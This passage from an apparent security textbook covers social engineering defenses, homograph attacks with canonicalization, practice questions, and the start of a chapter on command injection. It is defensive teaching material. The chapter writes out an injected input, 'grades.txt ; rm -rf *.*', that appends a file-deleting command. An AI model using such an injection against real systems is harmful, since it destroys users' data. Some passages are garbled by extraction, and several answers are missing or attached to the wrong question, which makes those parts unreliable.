audit to determine if the attack occurred previously and went unnoticed. Updates
to training may be necessary, as well as revisions to policy.
Inoculation
Inoculation is the process of making attack resistance a normal part of the work
experience. This involves exposing potential victims to frequent but benign
attacks so their awareness is always high and their response to such attacks is
always well rehearsed.
The term inoculation was derived from the medical context. This process involves
exposing a patient to a weakened form of a disease. As the patient’s immune
system defeats the attack, the immune system is strengthened. This analogy is an
accurate representation of the Inoculation anti-social engineering strategy. A
penetration tester probes the defenses of a business and carefully records how
the employee reacts. Periodic inoculations can help keep employees on guard,
inform them of their weaknesses, and highlight problems in the system.
Policy
An essential step in forming a defense is to define intrusion. Each organization
must have a comprehensive and well-communicated policy with regard to
information flow and dissemination. This policy should describe what types of
actions are allowable as well as what procedures people are to follow. For a policy
to be effective, several components need to be in place:
Robust A policy must be robust and without loopholes. The assets should be completely
protected from being compromised if the policy is fully and correctly
implemented.
Known A policy needs to be communicated to all the key players. A policy that is not
known or is misunderstood has no value.
Followed A policy needs to be followed with discipline by everyone. Effective social
engineers often take advantage of weak policy implementation by creating
situations where individuals are motivated to break with the plan.
Usually, policy is expressed in terms of the three ‘A’s: assets, authentication
procedures, and access control mechanisms:
The first ‘A’ is assets. It should be unambiguous what type of information is
private and which types of action are covered. Any ambiguity could result in an
opportunity for an attacker.
The second ‘A’ is authentication: what procedures are to be followed to
authenticate an individual requesting information? Most social engineering
attacks involve an individual attempting to deceive the victim as to their status or
role. Demanding authentication such as producing an ID or login credentials can
thwart most of these attacks.
The final ‘A’ is access control: Under what circumstances should information be
disclosed, updates be accepted, or actions taken? These should be completely
and unambiguously described. In the case where policy does not adequately
describe a given situation, there should be a well-defined fallback procedure.
Physical
The physical social engineering defensive mechanism includes physical or logical
mechanisms designed to deny attackers access to assets. In other words, even if
the victim can be manipulated by an attacker, no information will be leaked.
For example, consider a credit card hot-line. This is clearly a target for social
engineering attacks because, if the attacker can convince the operator to release
a credit card number, then the attacker can make an unauthorized purchase. An
example of a physical mechanism would be to accept calls only from a list of
known phone numbers. This would prevent outside attackers from even talking to
an operator and therefore stop the attack before it occurs. Another
physical mechanism would be for the operator to require a username and
password before accessing any information. No matter how much the social
engineer may convince the operator that he should provide the attacker with
information, no information will be forthcoming until the required username and
password are provided.
Common physical mechanisms include:
Shredding all documents When information is destroyed, social engineers are denied access.
Securely wiping media Just like the shredding mechanism, this precludes any access to the
content.
Firewalls and filters These prevent attacks from reaching human eyes.
Least privilege For those who are obvious targets of social engineers, minimize access to
valuable information: each employee has access to only what they need to do
their job.
Homographs
Social engineering attacks in face-to-face interactions can be difficult enough to
detect and prevent. The same attacks mediated through a computer can be
nearly impossible. This is because it can be very difficult to identify forgeries. One
special form of social engineering attack is homographs.
Homophones are two words pronounced the same but having different meanings
(e.g. “hair” and “hare”). Homonyms are two words that are spelled the same but
have different meanings (e.g. the verb “sow” and the noun “sow”). Homographs,
by contrast, are two words that visually appear the same but consist of different
characters. For example, the character 'A' is the uppercase Latin character with
the Unicode value of 0x0041. This character appears exactly the same as 'Α', the
Greek uppercase alpha with the Unicode value 0x0391. Thus the strings {0x0041,
0x0000} and {0x0391, 0x0000} are homographs because they both render as 'A'
(Gabrilovich & Gontmakher, 2002).
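This can be checked directly. The following short sketch (the variable names are chosen here for illustration) compares the two encodings:

```python
# Latin capital A (U+0041) vs. Greek capital Alpha (U+0391): the two
# glyphs render identically in most fonts, yet the code points differ,
# so a byte-for-byte string comparison reports them as different.
latin = "\u0041"   # 'A'
greek = "\u0391"   # 'Α'

print(latin, greek)                       # both render as 'A'
print(latin == greek)                     # False: the encodings differ
print(hex(ord(latin)), hex(ord(greek)))   # 0x41 0x391
```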
Homographs present a social engineering security problem because multiple
versions of a word could appear the same to a human observer but appear
distinct to a computer. For example, an e-mail could contain a link to a user’s
bank. On inspection, the URL could appear authentic, exactly the same as the
actual URL to the web site. However, if the 'o' in “www.bankofamerica.com” is
actually a Cyrillic 'o' (0x043e) instead of a Latin 'o' (0x006f), then a different IP
would be resolved sending the user to a different web page.
Another example of a homograph attack would be a SPAM author trying to sell a
questionable product. If the product was named “Varicomilyn,” then it would
be rather straightforward for the SPAM filter to search for the string. However,
if the SPAM author used a c-cedilla ('ç' or 0x00e7) instead of the 'c' or used the
number one ('1' or 0x0031) instead of 'l', then the name would escape the
SPAM filter but still be recognizable by the human reader.
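The evasion can be sketched in a few lines. The filter below is a deliberately naive stand-in (not any real SPAM filter): it searches for the literal product name and therefore misses the homograph variant.

```python
# A naive filter that searches for the literal product name.
def naive_filter(message: str) -> bool:
    """Return True if the message should be blocked."""
    return "Varicomilyn" in message

original  = "Buy Varicomilyn today!"
homograph = "Buy Vari\u00e7omi\u0031yn today!"   # ç for 'c', '1' for 'l'

print(naive_filter(original))    # True:  caught
print(naive_filter(homograph))   # False: evades the filter, yet a human
                                 # still reads it as the product name
```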
The following is a slightly sanitized real e-mail containing a large number of
homographs. Clearly this e-mail was designed to evade SPAM filters.
Figure 04.1: Part of a SPAM e-mail received by author containing many homographs
The Problem
The underlying problem with homographs is that there are a large number of
ways to represent a similar glyph on a given platform. To illustrate this point,
consider the word “Security.” If we restrict our homographs to just the uppercase
and lowercase versions of each letter, then the variations include: “security,”
“Security,” “sEcurity,” “SecURity,” etc. The number of variations is:
numVariations = 2⁸ = 256
Of course, there are more variations than just two for each letter. For an HTML
web page, the following exists:
International A Α А These are Latin, Greek, and Cyrillic. Depending on the letter, there
may be a very large number of equivalent glyphs.
LEET 0 O Short for LEET-speak; most Latin letters have 10 more variations.
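The count of case variations can be verified by brute force; a short sketch:

```python
import itertools

# Enumerate every upper/lower-case variation of "security": each of the
# eight letters contributes two choices, giving 2**8 = 256 strings.
word = "security"
variations = {"".join(combo)
              for combo in itertools.product(*((c.lower(), c.upper()) for c in word))}

print(len(variations))   # 256
```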
Defenses
There are several parts to the homograph problem: the encoding, the rendering
function, the rendition, and the observer function (Helfrich & Neff, 2012).
Encoding
e₁ (Encoding): A representation of some presentation.
The encoding is how the data is represented digitally. For example, the most
common encodings of plain text are ASCII, UTF-8, and Unicode. There are many
other possible encodings for text, of course!
Homographs do not need to be limited to plain text. They can exist in web pages
(where the encoding is HTML), images (encoded in JPG, PNG, GIF, or other image
formats), sound (encoded in WAV or MP3), or any other format. The homograph
scenario will specify which encoding is relevant.
The default way to compare two elements with a computer is to compare the
encodings. However, homographs exist when more than one encoding maps to a
given presentation. We represent an encoding with the lowercase e.
We represent the rendering function for a given homograph scenario with the
uppercase R( ). Since this is a function, it takes an input (in parentheses) and
has an output. Thus R(e₁) is the process of converting an encoding e₁ into some
presentation format.
Rendition
r₁ (Rendition): How a given encoding appears to the observer.
A rendition is the presentation of an encoding. This is the result of the rendering
function. A string of ASCII text would map to a rendition on the screen. An HTML
rendition would be the presentation of a web page in a browser window. An MP3
rendition would be played music.
We represent a rendition with the lowercase r. Thus, we can state that a
rendering function produces a rendition with: R(e₁) → r₁.
Observer Function
O(r₁, r₂) → p (Observer Function): The probability that a given observer will
consider two renditions the same. This probability is called the threshold of
belief.
So how do we know if a given user will consider two renditions to be the same?
In other words, what is the probability that a given human will look at two
renditions and not be able to tell the difference between them or consider them
the same? We capture this notion with the observer function.
The observer function takes two renditions as parameters and returns the
probability that a given user will consider them the same.
There are a few things to note about the observer function. First, it varies
according to the specific user we are considering. Some users may have a very
sharp eye and notice subtle differences between renditions that would go
unnoticed by others. Furthermore, the observer function could change according
to context. A user might quickly notice when his or her bank is misspelled but
might not notice subtle differences in a URL.
There are two formats for the observer function. The first returns a probability, a
value between 0 and 1. This format is: O(r₁, r₂) → p. A second format returns a
Boolean value, true if the two given renditions are within the threshold of belief
and false if they are not: O(r₁, r₂, t).
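As a toy model (an assumption for illustration only, treating renditions as equal-length strings of "pixels"), the two formats of the observer function might look like this:

```python
# O(r1, r2) -> p: the fraction of matching "pixels" stands in for the
# probability that an observer considers the renditions the same.
def observer(r1: str, r2: str) -> float:
    matches = sum(a == b for a, b in zip(r1, r2))
    return matches / max(len(r1), len(r2))

# O(r1, r2, t) -> Boolean: compare the probability against the
# threshold of belief t.
def observer_bool(r1: str, r2: str, t: float) -> bool:
    return observer(r1, r2) >= t

p = observer("##.##", "##.#.")
print(p)                                       # 0.8
print(observer_bool("##.##", "##.#.", 0.75))   # True
```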
Now that all the components are defined, we can formally specify a homograph.
Two encodings can be considered homographs of each other if a given user
considers them the same:
e₁ → R(e₁) → r₁
               O(r₁, r₂) → p
e₂ → R(e₂) → r₂
Figure 04.2: Relationship between encodings, renditions, and homographs
Note that there are three parts to this definition: the encodings (e₁ and e₂), the
rendering function (R( )), and the observer function (O( )). All homograph
scenarios must take these three components fully into account.
As with the observer function, the homograph function can take two forms. The
first returns the probability that two encodings will be considered the same by a
given observer: H(e₁, e₂) → p. This can also be expressed as: O(R(e₁), R(e₂)) → p.
In other words, the probability that two encodings would be considered
homographs is exactly the same as the probability that a given observer will liken
the renditions of two encodings.
The second format of the homograph function involves the threshold of belief. As
with the observer function, the homograph function will return a Boolean value:
true if two encodings are within the threshold of belief and false otherwise:
H(e₁, e₂, t). This too can be expressed in terms of the observer function:
H(e₁, e₂, t) = O(R(e₁), R(e₂), t).
Security, SECURITY, SECUrity, seCUriTY, sEcUrItY, SeCuRiTy, secuRITY → security
Figure 04.3: The canonicalization process
In general, the way to defeat homograph attacks is to canonicalize both the
search term and the searched text. Then the canonicalized terms can be equated
using a simple string comparison.
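Using the case-insensitive scenario as a stand-in (a sketch; the function names are chosen here, not taken from the text), the defense looks like this:

```python
# Canonicalize both the search term and the searched text, then use a
# plain substring comparison. Lower-casing serves as the
# canonicalization function for this scenario.
def canonicalize(text: str) -> str:
    return text.lower()

def contains(searched_text: str, term: str) -> bool:
    return canonicalize(term) in canonicalize(searched_text)

print(contains("Improve your SeCuRiTy today", "security"))   # True
print("security" in "Improve your SeCuRiTy today")            # False: a naive search misses it
```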
There are several components to the canonicalization process: homograph sets,
a canon, and the canonicalization function.
Homograph Set
h (Homograph Set): A set of unique encodings perceived by the observer as
being the same.
Earlier it was mentioned that the Latin letter 'A' appears identical to the Greek
'Α' even though the encodings are different (0x0041 vs. 0x0391). These letters are
homographs. Consider a set of such homographs representing all the ways we
can encode the letter 'A' in plain text. We call this a homograph set and represent
it with the lowercase h.
We can define a homograph set formally with:
eᵢ ∈ h ∧ eⱼ ∈ h ⇔ H(eᵢ, eⱼ)
Figure 04.4: Homograph set definition
In other words, two encodings are members of the same homograph set if the
observer considers them to be homographs. For a given homograph scenario,
there will be many homograph sets.
Canon
ܿ For a given homograph scenario, there are many homograph sets. We will give
each homograph set a unique name or symbol. This name is called a canon. The
Canon term “canon” means a general rule, fundamental principle, aphorism, or axiom
A unique governing the systematic or scientific treatment of a subject. For example, the set
representation of books constituting the Bible are called the “canon.”
of a homograph set.
The canonical form is “in its simplest or standard form.” For example, the
fractions ͳൗʹ, ʹൗͶ, and ͵ൗ are all equivalent. However, the standard way to write
one half is ͳൗʹ. This is the canonical form of the fraction. In the context of
homographs, a canon (or canonical token) is defined as a unique representation
of a homograph set. Note that the format of the canonical token c may or may
not be the same format as the encoding ݁ or the rendition format ݎ.
Canonicalization Function
C(e) (Canonicalization Function): The process of returning the canon for a given
encoding.
The canonicalization function is a function that returns a canon from a given
encoding:
C(e) → c
Figure 04.5: Canonicalization function definition
Recall our case-insensitive search problem mentioned earlier. In this case,
uppercase and lowercase versions of the same letter are considered homographs.
Thus the homograph sets would be {a, A}, {b, B}, {c, C}, …. We will identify
a canon as the lowercase version of each of the letters. Thus the canonicalization
function would be tolower().
All canonicalization functions must adhere to two properties: the unique canons
property and the reliable canons property. The unique canons property states
that any pair of non-homograph encodings will yield different canonical tokens:
∀ e₁, e₂ : C(e₁) ≠ C(e₂) ⇔ H(e₁, e₂) < t
Figure 04.6: The unique canons property
The reliable canons property states that the canonicalization function will always
yield identical canonical tokens for any homograph pair:
∀ e₁, e₂ : C(e₁) = C(e₂) ⇔ H(e₁, e₂)
Figure 04.7: Reliable canons property
Any canonicalization function that honors these two properties will be sufficient
to detect homographs.
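Both properties can be checked by brute force for the case-insensitive scenario, where tolower() serves as the canonicalization function. A sketch, with the homograph relation H defined here as same-letter-ignoring-case:

```python
# C(e): the canonicalization function for the case-insensitive scenario.
def C(e: str) -> str:
    return e.lower()

# H(e1, e2): the homograph relation for this scenario.
def H(e1: str, e2: str) -> bool:
    return e1.lower() == e2.lower()

# Unique canons: non-homographs never share a canon.
# Reliable canons: homographs always share a canon.
# Together: C(e1) == C(e2) exactly when H(e1, e2).
alphabet = "aAbBcC"
ok = all((C(e1) == C(e2)) == H(e1, e2) for e1 in alphabet for e2 in alphabet)
print(ok)   # True
```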
One approach to building such a function relies on the Earth Mover’s Distance
(EMD) algorithm traditionally used to compare images. When glyphs are
rendered into pixels, the EMD value can be computed directly. The end result is
a “SIM-LIST,” a list of the degree of similarity between Unicode glyphs using the
Arial font. An example of a SIM-LIST entry for the letter ‘i’ is the following:
0069 1:2170:ⅰ
1:FF49:ｉ
1:0069:i
1:0456:і
0.980198:00A1:¡
0.952381:1F77:ί
From this table we notice that there are 6 elements in the homograph set:
0x2170, 0xFF49, 0x0069, 0x0456, 0x00A1, and 0x1F77. Of these, the first four are
“perfect” homographs. This means there are no differences in the glyphs for
0x2170, 0xFF49, 0x0069, and 0x0456. The next one is a 98.01%
homograph. The final one is a 95.23% homograph. The renditions of these are the
following in Arial:
ⅰ ｉ i і ¡ ί
0x2170 0xFF49 0x0069 0x0456 0x00A1 0x1F77
Figure 04.8: Example of near homographs for the letter i
The canonicalization function will then look up a given glyph in the SIM-LIST and
return the lowest value. With this function, it becomes possible to find all names
that are visually similar to “Maze Solver.”
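A sim-list-driven canonicalization function can be sketched as follows. The table here is a hypothetical fragment holding only the perfect (p = 1.0) homographs of 'i' quoted above; a real SIM-LIST would cover far more of Unicode.

```python
# Map each known homograph to the canonical code point of its set.
SIM_LIST = {
    0x2170: 0x0069,   # Small Roman Numeral One -> 'i'
    0xFF49: 0x0069,   # Fullwidth Latin Small Letter i -> 'i'
    0x0456: 0x0069,   # Cyrillic Byelorussian-Ukrainian i -> 'i'
}

def canonicalize(text: str) -> str:
    """Replace every character with the canon of its homograph set."""
    return "".join(chr(SIM_LIST.get(ord(ch), ord(ch))) for ch in text)

print(canonicalize("Mar\u0456o") == "Mario")   # True: the Cyrillic i is normalized
```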
Examples
1. Q A man walks into a secure building behind an unknown woman. There
are two doors: one that has no security mechanisms and a second containing
a lock requiring a key-card for entrance. It is against policy for an employee to
allow someone to “tailgate” through the second door without authenticating
with the key-card. The woman opens the first of two doors, putting social
pressure on the man to open the second door in return.
A Reciprocation. This is very subtle. The gift given by the attacker (the woman) is
gratitude. The reciprocated gift of larger value is entrance into the secure
building. To mitigate this attack, the man should explain that it is against policy
to open the door and ensure the woman does not enter without key-card
authentication. If she were a real employee, she would understand.
2. Q A car salesman may casually ask a potential buyer if he likes a car that was
recently driven. The buyer replies “yes” because it is the polite thing to do. The
salesman then subtly reminds the buyer that he likes the car when it comes time
to negotiate the price. Any attempt to down-play the value of the car by the
buyer is thwarted because the buyer did say he liked the car!
A Commitment. The attacker tricked the victim to make a promise (that he likes
the car and thus intends to buy it) and then holds him to it (by subtly reminding
him about liking the car). To mitigate this attack, the victim could either renege
on his previous comment or simply point out that the comment was not a
binding agreement to buy the car.
4. Q A group of co-workers are walking through a secure facility together and notice
something odd. Company policy states that management should be notified and
a report needs to be made under such circumstances. One member of the group
suggests that this would be difficult, expensive, and pointless. It would be better
to just ignore the odd event. After several rounds of discussion, the group
decides to ignore the event. It turns out that the odd event was an attack on the
organization. When questioned about it later, none of the members of the
group can remember agreeing that it would be a good idea to not report it. Who
made that decision, anyway?
5. Q A tourist walking through the streets of a foreign city is looking for a market. By
chance, a man approaches the tourist and offers to give him directions. Being
extra polite, the man offers to walk with the tourist into the market. Once they
arrive, the man mentions that he owns one of the market shops. The gratitude
of the lost tourist prompts him to browse the merchant’s shop and encourages
him to make a purchase.
A Reciprocation. The man making the “by chance” encounter has done something
very nice for the tourist. In fact, he has done a real service. While a simple “thank
you” was offered, somehow it did not seem to be enough. When the shop owner
showed the tourist his shop, a more satisfying way to express gratitude was
offered. This actually happened to me on a family trip to Mexico. Though we did
not buy anything from this man, we certainly felt the pressure to do so. Later,
as we walked back to the bus stop, we encountered the same man escorting a
different group of lost tourists. He looked at us sheepishly!
6. Q A woman runs to the checkout line of a small business. She is out of breath and
appears frantic. As she digs out her wallet to make a purchase, she hurriedly
explains that she is late for an important event. The lady working as the cashier
tries her best to help the woman meet her deadline, but her credit card simply
will not authenticate. The woman explains that it often does that and can she
please use the old manual method. The cashier reluctantly agrees; the manual
method is only for emergencies after all! Later that day as the cashier runs the
manual credit card transaction through, the bank reports that the card was
stolen!
A Scarcity: Rushing. The woman was able to short-circuit the decision-making
process of the cashier so a weaker form of authentication could be used. This
enabled her to pass off a stolen credit card.
7. Q For the following scenario, name the social engineering defensive mechanism: I
tell my children to never reveal their name, address, or any other personal
information to strangers who call on the phone.
8. Q For the following scenario, name the social engineering defensive mechanism:
Your professor is teaching you about CARReL, the six types of social engineering
tactics.
A Training. You are being made aware of the types of attacks. No algorithm
(policy), physical mechanism (physical), or alert mechanism (reaction) is
presented.
9. Q For the following scenario, name the social engineering defensive mechanism:
All of my family’s private information is stored in an encrypted file and only two
members of the family know the password.
A Physical. No matter how much my children might be convinced that they need
to give the information away, they can't.
10. Q For the following scenario, name the social engineering defensive mechanism:
To harden my clerks against Social Engineering attacks, we practice, practice,
and practice some more.
A Inoculation. The more we practice, the better we can detect problems and learn
how to deal with them.
11. Q For the following scenario, name the social engineering defensive mechanism:
When I go into a store and the salesman starts using pressure tactics, my guard
is raised.
12. Q Which type of social engineering defense mechanisms will a software engineer
need to employ during the course of his or her career?
13.Q Classify the following type of social engineering attack based on the scenario: I
am going to trick you into believing I am someone you feel obligated to obey.
A Authority. The key difference between Authority and Likening is that the person
who is being impersonated with Authority has rank. The person being
impersonated with Likening does not have rank, but instead looks like someone
who is probably trustworthy.
14.Q Classify the following type of social engineering attack based on the scenario: I
do something nice in a situation where it would be impolite to not give a gift
back in return.
15.Q Classify the following type of social engineering attack based on the scenario: I
fool you into believing something is of limited supply which will compel you to
act.
A Scarcity. A sense of urgency is created by the belief that the item is of limited
supply.
16.Q Classify the following type of social engineering attack based on the scenario: I
break something causing you to call on me to get it fixed. This causes you to
believe that I have rank that I do not.
A Reverse Engineering. This may look like an Authority attack and frankly it is. The
goal here is to make you believe that I am someone with rank when I am not.
However, the manner in which the attack is carried out makes this look like
Reverse Engineering. Because I trick you to come to me, you are more likely to
believe that I have the rank I suggest. This is the heart of Reverse Engineering.
17.Q Classify the following type of social engineering attack based on the scenario: I
get you to make a promise then I hold you to it.
A Commitment. The promise was casually made but, because I hold you to it, you
are faced with two unpleasant alternatives: either break your promise or give
me what I want.
18.Q Classify the following type of social engineering attack based on the scenario: I
pretend I am from your high school class.
A Likening. I pretend I am part of a trusted group, but this group has no authority.
If the group had rank or authority, it would be an Authority attack.
19.Q Classify the following type of social engineering defense: When an attack is
found, I will be more vigilant.
A Reaction. First I need to detect the attack, then I need to change my behavior
to deal with the attack which is in progress.
20.Q Classify the following type of social engineering defense: I will put the sensitive
information behind a password that the target cannot access.
21.Q Classify the following type of social engineering defense: I will ask people to
periodically and unexpectedly try to attack me so I am used to it.
A Inoculation. The belief is that through practice, I will get stronger and learn my
weaknesses.
22.Q Classify the following type of social engineering defense: I will put procedures
in place which, if followed, will protect the assets.
A Policy. Because the procedures are handled by humans rather than machines,
this is Policy.
23.Q Classify the following type of social engineering defense: Your boss will make
sure that everyone is aware of CARReLS.
A There are 2 characters in each homograph set because each set has the
uppercase and lowercase version of the letter. There are 4 characters so the
number is size = nˡ where n = 2 and l = 4. Thus size = 2⁴ = 16.
25. Q The letter upper-case 'D' encoded in Unicode where p = 1.0. How many possible
homographs are there?
A Because p = 1.0, we need to find the homograph sets with 100% match in a sim-
list. This means members of the homograph set have pixel-perfect glyphs. The
hex ASCII code for 'D' is 0x44 so, looking up that row in the sim-list, we see:
0044 1:0044:D 1:FF24:Ｄ 1:216E:Ⅾ
The first column corresponds to the hex value, the second is the first member
of the sim-list. In this case, the character 0x0044 which is 'D' has a 1 or 100%
match. The next column corresponds to 0xFF24 which is “Fullwidth Latin Capital
D”. It also matches 0x0044 100% as one would expect in a p = 1.0 sim-list. The
final column corresponds to 0x216E which is “Roman Numeral Five Hundred.”
Thus there are 3 potential homographs.
26. Q The two letters 'Ad' encoded in Unicode where p = 0.9. How many possible
homographs are there?
A Because p = 0.9, we need to look up that row in the sim-list. To find homograph
sets with 90% match, the two relevant rows are:
0041 1:FF21:Ａ 1:0410:А 1:0041:A 1:0391:Α
0064 1:0064:d 1:FF44:ｄ 1:217E:ⅾ
Thus there are four elements in the 'A' homograph set and three in the 'd' set.
The number of homographs is thus 4 x 3 = 12.
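The counting rule generalizes: the number of potential homographs of a string is the product of its characters' homograph-set sizes. A sketch (the set sizes are taken from the sim-list rows above):

```python
from math import prod

# Homograph-set sizes for each character, per the quoted sim-list rows.
set_sizes = {"A": 4, "d": 3}

def count_homographs(word: str) -> int:
    return prod(set_sizes[ch] for ch in word)

print(count_homographs("Ad"))   # 12
```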
A This is the observer function. Given two renditions (r1 and r2), what is the
probability that the observer will consider them the same? The return value is a
number p where 0.0 ≤ p ≤ 1.0
A This is the unique canons property. Given two encodings (e1 and e2), If the
canons of e1 and e2 are not the same, then the two encodings are not
homographs.
29. Q The letter lower-case 'i' encoded in Unicode where p = 0.9. How many
possible homographs are there?
A Because p = 0.9, we need to look up that row in the sim-list to find homograph
sets with 90% match. This means that there is a 90% probability that the average
individual will consider these glyphs the same. The hex ASCII code for 'i' is 0x69
so, looking up that row in the sim-list, we see:
0069 1:2170:ⅰ 1:FF49:ｉ 1:0069:i 1:0456:і
0.980198:00A1:¡ 0.952381:1F77:ί
Again, the first column corresponds to the hex value that we look up. Each row
after that is the p value, the hex value, and a rendition of the glyph. These,
including the name of the Unicode glyph looked up separately, are:
Unicode p Glyph Description
0x2170 100% ⅰ Small Roman Numeral One
0xFF49 100% ｉ Fullwidth Latin Small Letter i
0x0069 100% i Latin Small Letter i
0x0456 100% і Cyrillic Small Letter Byelorussian-Ukrainian i
0x00A1 98.0% ¡ Inverted Exclamation Mark
0x1F77 95.2% ί Greek Small Letter Iota with Oxia
Thus there are 6 potential homographs.
30. Q Describe the Rendering function, the Observer function, and a Canonicalization
function for the following scenario: I would like to know if two student essays
are the same. Did they plagiarize?
31. Q Consider the scenario where a recording studio is trying to protect their
copyright for a collection of songs. To do this, they write a web-crawler that
searches for song files. Each song file is then compared against the songs in the
collection to see if it is a copy. How would one write a canonicalization function
to detect these homographs?
32. Q Imagine a SPAM filter attempting to remove inappropriate messages. The
author of the SPAM is attempting to evade the filter so humans will read the
message and buy the product. The filter is trying to detect the word “SPAM” and
delete all messages containing it. How would one write a canonicalization
function to detect the homographs of “SPAM?”
Exercises
1 Based on the following characteristics of a scam, identify the social engineering
tactic employed.
• You are one of just a few people eligible for the offer.
• Insistence on an immediate decision.
• The offer sounds too good to be true.
• You are asked to trust the telemarketer.
• High-pressure sales tactics.
• In the Nigerian Scam, the victim is asked to put forth a small sum of “trust
money” in exchange for a large prize in the end.
• A phishing e-mail has the appearance of a legitimate e-mail from your bank.
• In the Nigerian Scam, the attacker sends a picture of himself in which he is
depicted as being your gender, age, and race.
• In the Nigerian Scam, the attacker offers his SSN, bank account number,
phone number, and more.
• You are told you have won a prize, but you must pay for something before
you can receive it.
• “This house has been on the market for only one day. You will need to make
a full price offer if you want to get it.”
• “Take the car for a test drive. You can even take it home for the weekend if
you like. No obligation...”
• You get an e-mail from your bank informing you that your password has
been compromised and to create a new one.
• Satan tempts Jesus on top of the “exceedingly high mountain” promising
him “all the kingdoms of the world.”
2 What types of malware make the most use of social engineering tactics?
3 What types of malware make the least use of social engineering tactics?
4 Which of the following individuals is most likely to try to social engineer you?
• Teacher
• Salesman
• Politician
• Parent
5 In your own words, explain the five social engineering defense options.
6 For each of the following scenarios, describe how you would mitigate against
the social engineering attack. Try to employ as many of the above-listed defense
mechanisms as possible.
• You are negotiating the price of a car with a salesman and he attempts to
close the sale by using scarcity: “If you walk off the lot the deal is off.” What
do you do?
• The bank tells you by phone that your password has been compromised and
you need to create a new one. What do you do?
• You are the manager for the registrar’s office. You are very concerned about
student PII being disclosed through social engineering attacks. What should
you do?
7 From memory, list and define the six types of social engineering attacks.
8 From memory, list and define the five defenses to social engineering attacks.
9 How many potential homographs are there for the following scenarios?
• Case-insensitive filename consisting of 10 characters
• The letter lower-case 'o' encoded in Unicode where p = 1.0
• The letter upper-case 'I' encoded in Unicode where p = 0.90
• The two letters 'ID' encoded in Unicode where p = 1.0
10 Provide 10 homographs for the word “homograph”. For each one, provide both
the encoding and how it will be rendered.
12 Compare and contrast the five methods for defeating homograph attacks:
• punycode
• script coloring
• heuristics
• visual similarity
• canonicalization
Problems
1 Report on real-world social engineering attacks that you have witnessed first or
second hand. For each, identify the tactic used by the attacker.
2 What types of social engineering attacks are your children likely to face? How
can you protect them against such attacks?
4 For each of the following scenarios, describe the relevant Rendering function
(rendering engine), Observer function (scrutiny of the observer), and a
Canonicalization function:
x You are writing an e-mail client and wish to thwart phishing attacks against
a list of known e-commerce sites.
x You are working on a family Internet filter and wish to detect incoming
messages containing swear words.
x You are a photographer and have some copyright protected pictures on
publicly facing web pages. You would like to write a web crawler to find if
others have been hosting your pictures illegally.
x You would like to write a pornography filter for a firewall to prevent
inappropriate images from entering the company intranet.
x You are an administrator for a company e-mail server and would like to
prevent new e-mail accounts from being mistaken for existing accounts.
6 Write a program that prompts the user for two filenames. Determine if the two
filenames refer to the same file by writing a filename canonicalization function.
Unit 2: Code Hardening
Chapter 05: Command Injection
One of the main roles of a software engineer in providing security assurances is to identify and fix injection
vulnerabilities. This chapter is to help engineers recognize command injection vulnerabilities and come up
with strategies to prevent them from occurring.
Perhaps the simplest way to describe command injection is by example. Consider
the following fragment of Perl code:
my $fileName = <STDIN>;
system("cat /home/username/" . $fileName);
This will execute the command “cat” which displays the contents of a file as
provided from STDIN. A non-malicious user will then provide the following input:
grades.txt
Our simple Perl script will then create the following string which will be executed
by the system:
cat /home/username/grades.txt
This appears to be what the programmer intended. On the other hand, what if a
malicious user entered the following?
grades.txt ; rm -rf *.*
The end effect is that two operations will be executed: one to display the contents
of a file and the second to remove all files from the user’s directory. The second
operation is command injection.
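The attack is easy to see by simulating the string construction itself. The following sketch mirrors the Perl fragment in Python (the helper name is illustrative, not from the original script):

```python
# Simulate how the Perl script builds its command string.
def build_command(file_name):
    # Mirrors: system("cat /home/username/" . $fileName);
    return "cat /home/username/" + file_name

benign = build_command("grades.txt")
malicious = build_command("grades.txt ; rm -rf *.*")

# The benign input yields exactly one command...
print(benign)      # cat /home/username/grades.txt
# ...while the malicious input smuggles in a second one after the ';'.
print(malicious)   # cat /home/username/grades.txt ; rm -rf *.*
```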
On the 15th of July, 2015, the British telecommunications company TalkTalk
experienced a command injection attack on their main webpage. A second attack
occurred on the 2nd of September of the same year. Despite being aware of both
of these attacks and possessing the expertise to close the vulnerability,
management decided not to expedite a fix. On the 15th of October of 2015, a third
attack occurred. This attack resulted in 156,959 customer records being leaked.
Each record contained personal information such as name, birth date, phone and
email addresses. In almost 10% of the records, bank account details were also
leaked. Great Britain’s Information Commissioner found TalkTalk negligent for
“abdicating their security obligations” and for failing to “do more to safeguard its
customer information.” They were fined approximately a half million dollars as a
result.
Mitigation
There are three basic ways to mitigate command injection vulnerabilities:
complete, strong, and weak. Of course complete mitigation is the best, but when
it is not possible, other options exist.
Complete: Complete mitigation is to remove any possibility of command injection. This can
be achieved by removing the prerequisite and common denominator of all
command injection vulnerabilities: the command interpreter itself. SQL injection
is not possible when there is no SQL interpreter. FTP injection is not possible if
the system lacks the ability to process FTP commands. Shell injection is not
possible when the system does not contain the functionality to link with the
system’s command interpreter. Programmers use command interpreters
because they are convenient and powerful. In almost every case, another
approach can be found to achieve the same functionality without using a
command interpreter.
Strong: When it is not possible to achieve complete mitigation, the next preferred
option is a strong approach. Perhaps this is best explained by example.
Consider the Perl script on the previous page. Instead of allowing the user to
input arbitrary text into the $fileName variable, restrict input to only the
available file names on the system. In other words, create a set of all possible
valid inputs and restrict user input to elements in that set. This technique is called
a “white list” because the list contains elements known to be safe. As long as no
unsafe elements reside on the list and all user input conforms to the
list, we can be safe.
Weak: The final approach is one of last resort. When we are unable to perform
complete or strong mitigation, we are forced to look for input known to be
dangerous. Return to the Perl example on the previous page: the key element in
the attack vector is the use of a semicolon to place two commands on one line.
We could prevent the attack by invalidating any user input containing a
semicolon. This technique is called a “black list” because the list contains elements
known to be unsafe. As long as all unsafe elements reside on this list and
no user input matches an element on the list, we can be safe. The difficulty, of course,
is coming up with a complete list of all unsafe constructs!
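The white list and black list techniques can be sketched as follows (the allowed file names and forbidden characters here are hypothetical examples, not a complete list):

```python
# Sketch of the strong (white list) and weak (black list) approaches.
ALLOWED_FILES = {"grades.txt", "syllabus.txt", "notes.txt"}   # white list
FORBIDDEN_CHARS = {";", "|", "&", "`"}                        # black list

def is_safe_strong(file_name):
    # Strong: accept only input known to be safe.
    return file_name in ALLOWED_FILES

def is_safe_weak(file_name):
    # Weak: reject only input known to be dangerous.
    return not any(c in file_name for c in FORBIDDEN_CHARS)

assert is_safe_strong("grades.txt")
assert not is_safe_strong("grades.txt ; rm -rf *.*")
# The weak check also catches this attack, but only because ';' is on
# the list; an unlisted dangerous construct would slip through.
assert not is_safe_weak("grades.txt ; rm -rf *.*")
assert is_safe_weak("grades.txt")
```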
The four most common types of command injection attacks target SQL or other
database query languages, LDAP, FTP or other remote file transfer
